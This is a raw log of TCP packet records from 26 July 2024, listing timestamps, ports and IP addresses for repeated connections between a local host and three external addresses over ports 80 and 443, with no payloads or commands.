Jul 26, 2024 12:57:41.035732031 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.035792112 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.035798073 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.035835028 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.037533045 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.037552118 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.037606955 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.037612915 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.037652969 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.039345980 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.039366007 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.039427996 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.039433956 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.039472103 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.040430069 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.040448904 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.040496111 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.040503025 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.040544033 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.042257071 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.042316914 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.042336941 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.042342901 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.042368889 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.042387962 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.043179035 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.043219090 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.043246984 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.043251991 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.043277979 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.043296099 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.044213057 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.044255972 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.044290066 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.044295073 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.044322968 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.044334888 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.044859886 CEST	80	60825	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:41.044925928 CEST	60825	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:41.090507030 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.090550900 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.090598106 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.090610027 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.090621948 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.090647936 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.091753960 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.091793060 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.091821909 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.091825962 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.091851950 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.091866970 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.093532085 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.093580961 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.093611956 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.093617916 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.093640089 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.093658924 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.095277071 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.095320940 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.095350981 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.095355988 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.095374107 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.095391035 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.096187115 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.096227884 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.096256018 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.096260071 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.096286058 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.096302986 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.106903076 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.106944084 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.106975079 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.106980085 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.107001066 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.107018948 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.108628035 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.108669043 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.108700991 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.108705044 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.108722925 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.108741045 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.109513998 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.109556913 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.109591007 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.109595060 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.109615088 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.109632969 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.147743940 CEST	60825	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:41.148058891 CEST	60826	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:41.153186083 CEST	80	60826	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:41.153256893 CEST	60826	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:41.153392076 CEST	60826	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:41.158396006 CEST	80	60826	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:41.171339989 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.171384096 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.171436071 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.171463966 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.171480894 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.171502113 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.172576904 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.172648907 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.172662973 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.172699928 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.172727108 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.172744989 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.172746897 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.172782898 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.172810078 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.172827005 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.172837973 CEST	443	60823	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.172884941 CEST	60823	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.179824114 CEST	80	60825	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:41.179867029 CEST	60825	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:41.597363949 CEST	60827	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.597467899 CEST	443	60827	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.597608089 CEST	60827	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.597920895 CEST	60827	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:41.597959995 CEST	443	60827	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:41.903424978 CEST	80	60826	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:41.903477907 CEST	60826	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:41.904118061 CEST	60826	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:41.908931971 CEST	80	60826	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:42.154577017 CEST	80	60826	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:42.157891035 CEST	60826	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:42.250405073 CEST	443	60827	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:42.252980947 CEST	60827	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:42.253416061 CEST	60827	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:42.253433943 CEST	443	60827	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:42.254973888 CEST	60827	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:42.254987001 CEST	443	60827	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:42.274008989 CEST	60826	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:42.274986982 CEST	60828	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:42.279875994 CEST	80	60826	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:42.279973984 CEST	60826	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:42.279974937 CEST	80	60828	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:42.280162096 CEST	60828	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:42.280354977 CEST	60828	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:42.285276890 CEST	80	60828	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:42.884597063 CEST	443	60827	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:42.884654999 CEST	443	60827	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:42.884778976 CEST	60827	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:42.884804010 CEST	443	60827	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:42.884870052 CEST	60827	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:42.884968042 CEST	60827	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:42.884968042 CEST	60827	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:42.885013103 CEST	443	60827	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:42.885077000 CEST	60827	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:42.887172937 CEST	60829	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:42.887223005 CEST	443	60829	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:42.887288094 CEST	60829	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:42.887515068 CEST	60829	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:42.887548923 CEST	443	60829	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:43.022701979 CEST	80	60828	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:43.025368929 CEST	60828	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:43.025783062 CEST	60828	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:43.030735016 CEST	80	60828	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:43.270880938 CEST	80	60828	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:43.271182060 CEST	60828	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:43.385833025 CEST	60828	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:43.386276007 CEST	60830	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:43.393116951 CEST	80	60830	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:43.393214941 CEST	60830	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:43.393383026 CEST	60830	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:43.395519972 CEST	80	60828	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:43.395584106 CEST	60828	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:43.399059057 CEST	80	60830	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:43.565268993 CEST	443	60829	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:43.565361023 CEST	60829	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:43.565916061 CEST	60829	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:43.565936089 CEST	443	60829	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:43.567404032 CEST	60829	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:43.567415953 CEST	443	60829	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:44.163523912 CEST	80	60830	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:44.163711071 CEST	60830	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:44.164355993 CEST	60830	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:44.169256926 CEST	80	60830	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:44.388014078 CEST	443	60829	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:44.388122082 CEST	60829	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:44.388139963 CEST	443	60829	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:44.388195992 CEST	60829	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:44.388361931 CEST	60829	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:44.388380051 CEST	443	60829	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:44.413899899 CEST	80	60830	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:44.414154053 CEST	60830	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:44.419487000 CEST	60831	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:44.419537067 CEST	443	60831	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:44.419609070 CEST	60831	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:44.419805050 CEST	60831	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:44.419819117 CEST	443	60831	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:44.524445057 CEST	60830	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:44.524713039 CEST	60832	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:44.529557943 CEST	80	60832	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:44.529655933 CEST	60832	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:44.529786110 CEST	60832	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:44.530029058 CEST	80	60830	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:44.530100107 CEST	60830	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:44.534550905 CEST	80	60832	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:45.082349062 CEST	443	60831	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:45.082487106 CEST	60831	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:45.082914114 CEST	60831	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:45.082928896 CEST	443	60831	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:45.084480047 CEST	60831	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:45.084500074 CEST	443	60831	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:45.278594971 CEST	80	60832	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:45.278749943 CEST	60832	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:45.279392004 CEST	60832	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:45.284296989 CEST	80	60832	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:45.527192116 CEST	80	60832	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:45.527286053 CEST	60832	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:45.637463093 CEST	60832	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:45.637741089 CEST	60833	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:45.642678022 CEST	80	60833	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:45.642791986 CEST	60833	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:45.642880917 CEST	60833	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:45.642941952 CEST	80	60832	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:45.642997980 CEST	60832	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:45.647896051 CEST	80	60833	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:45.716860056 CEST	443	60831	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:45.716960907 CEST	60831	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:45.716976881 CEST	443	60831	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:45.717025042 CEST	443	60831	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:45.717029095 CEST	60831	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:45.717098951 CEST	60831	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:45.717900991 CEST	60831	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:45.717920065 CEST	443	60831	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:46.384879112 CEST	80	60833	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:46.385006905 CEST	60833	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:46.385679960 CEST	60833	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:46.390641928 CEST	80	60833	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:46.445144892 CEST	60834	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:46.445188046 CEST	443	60834	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:46.445288897 CEST	60834	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:46.445499897 CEST	60834	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:46.445518017 CEST	443	60834	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:46.631437063 CEST	80	60833	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:46.631769896 CEST	60833	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:46.741758108 CEST	60833	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:46.741955042 CEST	60835	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:46.746855974 CEST	80	60835	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:46.746938944 CEST	60835	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:46.747028112 CEST	60835	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:46.747689962 CEST	80	60833	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:46.747742891 CEST	60833	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:46.751804113 CEST	80	60835	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:47.120620966 CEST	443	60834	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:47.120743990 CEST	60834	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:47.121229887 CEST	60834	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:47.121244907 CEST	443	60834	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:47.122961998 CEST	60834	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:47.122968912 CEST	443	60834	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:47.491573095 CEST	80	60835	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:47.491638899 CEST	60835	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:47.492186069 CEST	60835	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:47.507515907 CEST	80	60835	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:47.749099970 CEST	80	60835	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:47.749186993 CEST	60835	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:47.830995083 CEST	443	60834	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:47.831094027 CEST	60834	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:47.831115007 CEST	443	60834	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:47.831161022 CEST	443	60834	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:47.831163883 CEST	60834	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:47.831211090 CEST	60834	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:47.831310034 CEST	60834	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:47.831326962 CEST	443	60834	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:47.833913088 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:47.838879108 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:47.838979959 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:47.840015888 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:47.850848913 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:47.852595091 CEST	60835	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:47.852854013 CEST	60837	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:47.857753992 CEST	80	60837	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:47.857836962 CEST	60837	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:47.857928991 CEST	60837	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:47.858187914 CEST	80	60835	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:47.858239889 CEST	60835	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:47.862732887 CEST	80	60837	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:48.364026070 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.364074945 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.364084959 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.364101887 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.364116907 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.364120007 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.364136934 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.364141941 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.364152908 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.364155054 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.364171028 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.364176989 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.364197016 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.364208937 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.364475012 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.364506006 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.364518881 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.364548922 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.364655972 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.364697933 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.369556904 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.369611025 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.369616032 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.369632959 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.369661093 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.369673014 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.459436893 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.459455967 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.459537983 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.459548950 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.459614992 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.459629059 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.459670067 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.459757090 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.459767103 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.459796906 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.459814072 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.460000992 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.460011005 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.460036993 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.460046053 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.460498095 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.460551977 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.460568905 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.460578918 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.460602999 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.460621119 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.460778952 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.460788965 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.460822105 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.461441994 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.461488008 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.461504936 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.461513996 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:48.461533070 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:48.461549044 CEST	60836	80	192.168.2.6	198.46.178.145
